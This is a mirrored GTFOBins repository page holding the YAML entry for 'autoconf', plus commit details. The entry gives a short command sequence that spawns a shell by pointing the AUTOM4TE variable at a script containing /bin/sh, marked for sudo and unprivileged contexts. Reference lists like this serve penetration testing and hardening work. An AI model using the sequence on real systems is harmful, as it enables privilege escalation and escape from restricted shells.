1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2026-03-07 14:36:23 +01:00
GTFOBins.github.io/_gtfobins/autoconf
Andrea Cardaci 7349ccad89 Fix autoconf
2026-02-12 18:58:01 +01:00

13 lines
228 B
Plaintext

---
functions:
shell:
- code: |-
echo /bin/sh >/path/to/temp-file
chmod +x /path/to/temp-file
touch configure.ac
AUTOM4TE=/path/to/temp-file autoconf
contexts:
sudo:
unprivileged:
...